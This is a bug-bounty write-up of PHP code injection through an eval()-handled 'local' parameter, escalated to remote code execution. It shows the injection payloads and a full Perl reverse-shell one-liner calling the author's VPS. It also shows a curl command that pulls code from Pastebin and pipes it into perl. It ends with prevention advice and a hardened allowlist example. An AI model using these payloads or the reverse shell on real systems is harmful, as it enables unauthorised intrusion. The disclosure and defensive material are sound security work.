RCE By Code Injection | Perl Reverse Shell
What is the PHP code injection weakness?
Code injection is an attack that delivers a malicious code payload through a vulnerable entry point, typically an eval() call that compiles user input without any sanitisation and without blocking dangerous functions like exec(), shell_exec(), system() or passthru().
Background story
While hunting on a private program, I like to search for custom parameters in Burp Suite after finishing a test, such as SSRF, LFI and XSS parameters and ones I wrote myself; you can see the GF-Patterns repo for many parameters.
I found an interesting parameter named [ local ] in a POST request. I tried to test SSRF and LFI but failed.
Trying to inject PHP code because the subdomain uses a PHP backend, so.. let's hack :)
Injected payload
print("AbdulrahmanKamel0xx")
Using [ ; ] to terminate the previous statement, but it failed [X]
;print("AbdulrahmanKamel0xx")
Using a single quote ['] to close the string literal and [.] to concatenate => '..'
'.print("AbdulrahmanKamel0xx").'
Injected Code Success ^_^
The expected backend code (a reconstruction; the real source was not visible):
<?php
// First guess: the raw request value is passed straight to eval()
$input = $_REQUEST['local'];
eval($input);
?>
If the parameter value is reflected inside double quotes, the injected code executes directly; inside single quotes it cannot, so we used a single quote to close the string literal and the dot operator to concatenate our code:
'.system("command").'
<?php
// Refined guess: the value lands inside a single-quoted literal within the
// string that eval() compiles ($local is an assumed variable name)
$input = $_REQUEST['local'];
eval('$local = \'' . $input . '\';');
?>
Getting Reverse Shell
I am listening on port 1234 on my VPS and trying to get a reverse shell ..
Tried a bash script and many other ways, but failed [X] :(
Tried to check whether netcat or socat is on the server, but they are not installed [X]
'.system("nc -v").'
I tried checking many languages like Python and Ruby and many tools that can get a reverse shell; none were found, but when I checked for the Perl language,
we could get a reverse shell with this code
perl -e 'use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
The operation failed because the [&] sign ends the current parameter and starts a new one, as in username=admin&password=pass
I tried to encode this sign, but it did not work ..
I tried to check whether the curl tool is installed with this query
'.system("curl -v").'
It was found. Good, let's bypass this problem
I uploaded the Perl code to the Pastebin website after removing perl -e and the ['] quotes ..
use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
Using curl to fetch this code and execute it through a pipe
curl https://pastebin.com/raw/EEaH**** | perl
...
'.system("curl https://pastebin.com/raw/EEaH**** | perl").'
BOOM!! It worked and I got a reverse shell
Prevent PHP code injection
- Replace or ban arguments containing & ; && |
- Avoid using exec(), shell_exec(), system() or passthru()
- Avoid relying on strip_tags() for sanitisation
- Use a PHP security linter
- Utilise a SAST tool to identify code injection issues
- Do not trust any data from the user
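As an added example (not the author's code and not the backend of the program tested), the vulnerable eval() shape reconstructed from the post is shown beside a hardened handler that removes eval() entirely and applies the prevention points above; the function names and the locale allowlist are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Vulnerable shape reconstructed from the post: request data is spliced into a
// single-quoted literal inside the string handed to eval(). A value such as
//   '.print("x").'
// closes the literal and concatenates attacker-chosen PHP. Defined here only
// for contrast; it is never called.
function vulnerableLocal(string $input): string
{
    $local = '';
    eval('$local = \'' . $input . '\';');   // never do this with request data
    return $local;
}

// Hardened handler: no eval() and no shell functions. The value is compared
// against an allowlist of expected values (a hypothetical locale set); anything
// else is rejected and logged with the raw bytes hex-encoded, which gives a
// clean detection signal for probes like the ones in the post.
const ALLOWED_LOCALES = ['en', 'ar', 'fr', 'de'];

function safeLocal(string $input): ?string
{
    if (!in_array($input, ALLOWED_LOCALES, true)) {
        error_log('rejected local parameter: ' . bin2hex($input));
        return null;
    }
    return $input;
}

// Constructed sample inputs: one legitimate value and the post's probe payloads.
$samples = [
    'en',
    ';print("AbdulrahmanKamel0xx")',
    '\'.print("AbdulrahmanKamel0xx").\'',
];
foreach ($samples as $s) {
    $r = safeLocal($s);
    echo str_pad($s, 40), ' => ', $r === null ? 'REJECTED' : "accepted ($r)", PHP_EOL;
}
```

Running it prints "accepted (en)" for the first sample and REJECTED for both probe payloads, with the rejected values written to the PHP error log.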